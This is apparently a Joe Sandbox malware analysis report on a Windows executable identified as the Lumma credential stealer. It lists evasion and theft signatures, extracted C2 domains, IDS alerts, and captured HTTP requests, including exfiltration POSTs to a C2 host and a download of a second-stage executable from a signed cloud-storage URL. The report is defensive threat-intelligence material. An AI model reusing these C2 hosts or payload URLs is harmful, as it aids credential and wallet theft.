Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
TmmiCE5Ulm.exe

Overview

General Information

Sample name:TmmiCE5Ulm.exe
renamed because original name is a hash value
Original sample name:39a156657be03cc94d69874b25836b8c.exe
Analysis ID:1579676
MD5:39a156657be03cc94d69874b25836b8c
SHA1:c23e004baca2916e986c556974abaab7783bdba7
SHA256:5bfd8db573ebaf03ceffdbe9a0b94a69574930222253a4de5ad02e2e735c9041
Tags:exeuser-abuse_ch
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Detected potential crypto function
Entry point lies outside standard sections
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • TmmiCE5Ulm.exe (PID: 5600 cmdline: "C:\Users\user\Desktop\TmmiCE5Ulm.exe" MD5: 39A156657BE03CC94D69874B25836B8C)
    • WerFault.exe (PID: 3720 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5600 -s 1924 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["energyaffai.lat", "grannyejh.lat", "sustainskelet.lat", "discokeyus.lat", "necklacebudi.lat", "rapeflowwj.lat", "aspecteirs.lat", "sweepyribs.lat", "crosshuaht.lat"], "Build id": "LOGS11--LiveTraffic"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      00000000.00000003.2228599565.000000000118B000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000000.00000003.2231964807.0000000001154000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000000.00000003.2205019616.000000000118B000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000000.00000003.2232123533.0000000001154000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              00000000.00000003.2231739674.0000000001154000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                Click to see the 5 entries
                No Sigma rule has matched
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T07:26:22.907787+010020283713Unknown Traffic192.168.2.54970423.55.153.106443TCP
                2024-12-23T07:26:25.273559+010020283713Unknown Traffic192.168.2.549705104.21.66.86443TCP
                2024-12-23T07:26:27.523188+010020283713Unknown Traffic192.168.2.549706104.21.66.86443TCP
                2024-12-23T07:26:30.005399+010020283713Unknown Traffic192.168.2.549707104.21.66.86443TCP
                2024-12-23T07:26:32.418082+010020283713Unknown Traffic192.168.2.549708104.21.66.86443TCP
                2024-12-23T07:26:34.851601+010020283713Unknown Traffic192.168.2.549709104.21.66.86443TCP
                2024-12-23T07:26:37.433944+010020283713Unknown Traffic192.168.2.549713104.21.66.86443TCP
                2024-12-23T07:26:39.946896+010020283713Unknown Traffic192.168.2.549716104.21.66.86443TCP
                2024-12-23T07:26:45.605600+010020283713Unknown Traffic192.168.2.549733104.21.66.86443TCP
                2024-12-23T07:26:48.168779+010020283713Unknown Traffic192.168.2.549739185.166.143.49443TCP
                2024-12-23T07:26:50.605999+010020283713Unknown Traffic192.168.2.5497453.5.16.86443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T07:26:26.025898+010020546531A Network Trojan was detected192.168.2.549705104.21.66.86443TCP
                2024-12-23T07:26:28.306228+010020546531A Network Trojan was detected192.168.2.549706104.21.66.86443TCP
                2024-12-23T07:26:46.388182+010020546531A Network Trojan was detected192.168.2.549733104.21.66.86443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T07:26:26.025898+010020498361A Network Trojan was detected192.168.2.549705104.21.66.86443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T07:26:28.306228+010020498121A Network Trojan was detected192.168.2.549706104.21.66.86443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T07:26:20.737542+010020583541Domain Observed Used for C2 Detected192.168.2.5519721.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T07:26:21.049421+010020583581Domain Observed Used for C2 Detected192.168.2.5595071.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T07:26:20.251882+010020583601Domain Observed Used for C2 Detected192.168.2.5533001.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T07:26:20.575002+010020583621Domain Observed Used for C2 Detected192.168.2.5574871.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T07:26:19.969987+010020583641Domain Observed Used for C2 Detected192.168.2.5534831.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T07:26:20.422354+010020583701Domain Observed Used for C2 Detected192.168.2.5565331.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T07:26:21.191727+010020583741Domain Observed Used for C2 Detected192.168.2.5564881.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T07:26:20.908101+010020583761Domain Observed Used for C2 Detected192.168.2.5620631.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T07:26:19.826811+010020583781Domain Observed Used for C2 Detected192.168.2.5576581.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T07:26:38.213154+010020480941Malware Command and Control Activity Detected192.168.2.549713104.21.66.86443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T07:26:39.957213+010028438641A Network Trojan was detected192.168.2.549716104.21.66.86443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T07:26:23.688885+010028586661Domain Observed Used for C2 Detected192.168.2.54970423.55.153.106443TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: TmmiCE5Ulm.exeAvira: detected
                Source: TmmiCE5Ulm.exe.5600.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["energyaffai.lat", "grannyejh.lat", "sustainskelet.lat", "discokeyus.lat", "necklacebudi.lat", "rapeflowwj.lat", "aspecteirs.lat", "sweepyribs.lat", "crosshuaht.lat"], "Build id": "LOGS11--LiveTraffic"}
                Source: TmmiCE5Ulm.exeReversingLabs: Detection: 57%
                Source: TmmiCE5Ulm.exeVirustotal: Detection: 69%Perma Link
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: TmmiCE5Ulm.exeJoe Sandbox ML: detected
                Source: 00000000.00000003.2066355701.0000000004F70000.00000004.00001000.00020000.00000000.sdmpString decryptor: rapeflowwj.lat
                Source: 00000000.00000003.2066355701.0000000004F70000.00000004.00001000.00020000.00000000.sdmpString decryptor: crosshuaht.lat
                Source: 00000000.00000003.2066355701.0000000004F70000.00000004.00001000.00020000.00000000.sdmpString decryptor: sustainskelet.lat
                Source: 00000000.00000003.2066355701.0000000004F70000.00000004.00001000.00020000.00000000.sdmpString decryptor: aspecteirs.lat
                Source: 00000000.00000003.2066355701.0000000004F70000.00000004.00001000.00020000.00000000.sdmpString decryptor: energyaffai.lat
                Source: 00000000.00000003.2066355701.0000000004F70000.00000004.00001000.00020000.00000000.sdmpString decryptor: necklacebudi.lat
                Source: 00000000.00000003.2066355701.0000000004F70000.00000004.00001000.00020000.00000000.sdmpString decryptor: discokeyus.lat
                Source: 00000000.00000003.2066355701.0000000004F70000.00000004.00001000.00020000.00000000.sdmpString decryptor: grannyejh.lat
                Source: 00000000.00000003.2066355701.0000000004F70000.00000004.00001000.00020000.00000000.sdmpString decryptor: sweepyribs.lat
                Source: 00000000.00000003.2066355701.0000000004F70000.00000004.00001000.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                Source: 00000000.00000003.2066355701.0000000004F70000.00000004.00001000.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
                Source: 00000000.00000003.2066355701.0000000004F70000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
                Source: 00000000.00000003.2066355701.0000000004F70000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
                Source: 00000000.00000003.2066355701.0000000004F70000.00000004.00001000.00020000.00000000.sdmpString decryptor: Workgroup: -
                Source: 00000000.00000003.2066355701.0000000004F70000.00000004.00001000.00020000.00000000.sdmpString decryptor: LOGS11--LiveTraffic
                Source: TmmiCE5Ulm.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.5:49704 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49705 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49706 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49707 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49708 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49709 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49713 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49716 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49733 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 185.166.143.49:443 -> 192.168.2.5:49739 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 3.5.16.86:443 -> 192.168.2.5:49745 version: TLS 1.2
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeDirectory queried: number of queries: 1001

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2058370 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacebudi .lat) : 192.168.2.5:56533 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058376 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sustainskelet .lat) : 192.168.2.5:62063 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058364 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat) : 192.168.2.5:53483 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058358 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crosshuaht .lat) : 192.168.2.5:59507 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058374 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rapeflowwj .lat) : 192.168.2.5:56488 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058360 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (discokeyus .lat) : 192.168.2.5:53300 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058378 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sweepyribs .lat) : 192.168.2.5:57658 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058362 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (energyaffai .lat) : 192.168.2.5:57487 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058354 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (aspecteirs .lat) : 192.168.2.5:51972 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.5:49704 -> 23.55.153.106:443
                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49705 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49705 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49713 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49706 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49706 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49733 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.5:49716 -> 104.21.66.86:443
                Source: Malware configuration extractorURLs: energyaffai.lat
                Source: Malware configuration extractorURLs: grannyejh.lat
                Source: Malware configuration extractorURLs: sustainskelet.lat
                Source: Malware configuration extractorURLs: discokeyus.lat
                Source: Malware configuration extractorURLs: necklacebudi.lat
                Source: Malware configuration extractorURLs: rapeflowwj.lat
                Source: Malware configuration extractorURLs: aspecteirs.lat
                Source: Malware configuration extractorURLs: sweepyribs.lat
                Source: Malware configuration extractorURLs: crosshuaht.lat
                Source: Joe Sandbox ViewIP Address: 104.21.66.86 104.21.66.86
                Source: Joe Sandbox ViewIP Address: 23.55.153.106 23.55.153.106
                Source: Joe Sandbox ViewIP Address: 185.166.143.49 185.166.143.49
                Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49706 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49705 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49708 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49707 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49704 -> 23.55.153.106:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49709 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49716 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49739 -> 185.166.143.49:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49713 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49733 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49745 -> 3.5.16.86:443
                Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 53Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=0UCQVNE1GL0PUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12805Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=BHAYJ4KONJV7SU6NGEUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15083Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=I71U69D925SIUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20537Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=HZ3IPPG7Q7NUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1223Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=H8XL4F3YH8PVALUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 551287Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 88Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: GET /mynewworkspace123312/scnd/downloads/FormattingCharitable.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: bitbucket.org
                Source: global trafficHTTP traffic detected: GET /70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-464c-9988-4c3c4d541130/FormattingCharitable.exe?response-content-disposition=attachment%3B%20filename%3D%22FormattingCharitable.exe%22&AWSAccessKeyId=ASIA6KOSE3BNNKAFY4FX&Signature=JhHfBCFLHyX01YjJtloXBFvJXdM%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEAcaCXVzLWVhc3QtMSJIMEYCIQDWGRIMb9LXXZfl79VFTq%2FskFvxmioOtofL0dfIDqFZ2gIhAJP8GSyu6qftK4UeqX9cHuX5XOOr967KFLOAaxmwQGOTKrACCM%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEQABoMOTg0NTI1MTAxMTQ2Igx0FWF5ybJCkmhX8pgqhAI4vlZyemYNIdhtILr1PBwGVPbyRawX2P9SOAz2sH4A2MXWbLs4VI9hExZK0Et1K%2FZfcAv2DK2%2F%2F3UbHXRF09xPQgClbYp%2BUS1fkeGjEn1qP%2BWN%2F0mNeOH6WJKEOgO9kxNbGmFR5%2FkdpRFho4uTMfUFiKjlhLrQRw6zkgUAadjCAt42zf2Eg5d4xi8HlEW7deLbE%2FM71ylNr%2FYb3X3TrZqMv1qaJkHPadg%2BUk0sct3PeuuUp0CaqVtex3wqgZbKjEbcNjMQ31Hh7gqXTU6knOY57iFcj%2BPJ5cpn8pXxspPZdFJdCoU3R2oQlF2BkZWmj6nywk6Rq9sTdCADM4SjzSxySMlaGzDBgqS7BjqcAXQQ9opzWNiG8NvY5n4BKs1tDtNnnJkDK9ZBfjAjPIA8iWxzfe9xFtNIbh1RExp6zD%2B7N2NmnwOrDW8mME7nCVE9fi5w6eJ3rXchZXw4BEgi14dReaKJTufHw9TIjvP6fx%2Fjz6IH7b9xdtcTbF%2FIWmng5vjYbTyPUCVFxV5VFqpkIGpa3GEdHu1RK6Fla4M5z4Tr1RQW9xDqc9Tzpg%3D%3D&Expires=1734936649 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: bbuseruploads.s3.amazonaws.com
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                Source: global trafficHTTP traffic detected: GET /mynewworkspace123312/scnd/downloads/FormattingCharitable.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: bitbucket.org
                Source: global trafficHTTP traffic detected: GET /70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-464c-9988-4c3c4d541130/FormattingCharitable.exe?response-content-disposition=attachment%3B%20filename%3D%22FormattingCharitable.exe%22&AWSAccessKeyId=ASIA6KOSE3BNNKAFY4FX&Signature=JhHfBCFLHyX01YjJtloXBFvJXdM%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEAcaCXVzLWVhc3QtMSJIMEYCIQDWGRIMb9LXXZfl79VFTq%2FskFvxmioOtofL0dfIDqFZ2gIhAJP8GSyu6qftK4UeqX9cHuX5XOOr967KFLOAaxmwQGOTKrACCM%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEQABoMOTg0NTI1MTAxMTQ2Igx0FWF5ybJCkmhX8pgqhAI4vlZyemYNIdhtILr1PBwGVPbyRawX2P9SOAz2sH4A2MXWbLs4VI9hExZK0Et1K%2FZfcAv2DK2%2F%2F3UbHXRF09xPQgClbYp%2BUS1fkeGjEn1qP%2BWN%2F0mNeOH6WJKEOgO9kxNbGmFR5%2FkdpRFho4uTMfUFiKjlhLrQRw6zkgUAadjCAt42zf2Eg5d4xi8HlEW7deLbE%2FM71ylNr%2FYb3X3TrZqMv1qaJkHPadg%2BUk0sct3PeuuUp0CaqVtex3wqgZbKjEbcNjMQ31Hh7gqXTU6knOY57iFcj%2BPJ5cpn8pXxspPZdFJdCoU3R2oQlF2BkZWmj6nywk6Rq9sTdCADM4SjzSxySMlaGzDBgqS7BjqcAXQQ9opzWNiG8NvY5n4BKs1tDtNnnJkDK9ZBfjAjPIA8iWxzfe9xFtNIbh1RExp6zD%2B7N2NmnwOrDW8mME7nCVE9fi5w6eJ3rXchZXw4BEgi14dReaKJTufHw9TIjvP6fx%2Fjz6IH7b9xdtcTbF%2FIWmng5vjYbTyPUCVFxV5VFqpkIGpa3GEdHu1RK6Fla4M5z4Tr1RQW9xDqc9Tzpg%3D%3D&Expires=1734936649 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: bbuseruploads.s3.amazonaws.com
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2155269616.0000000001184000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132726091.0000000001184000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2204525623.000000000118B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-sr equals www.youtube.com (Youtube)
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001184000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowere equals www.youtube.com (Youtube)
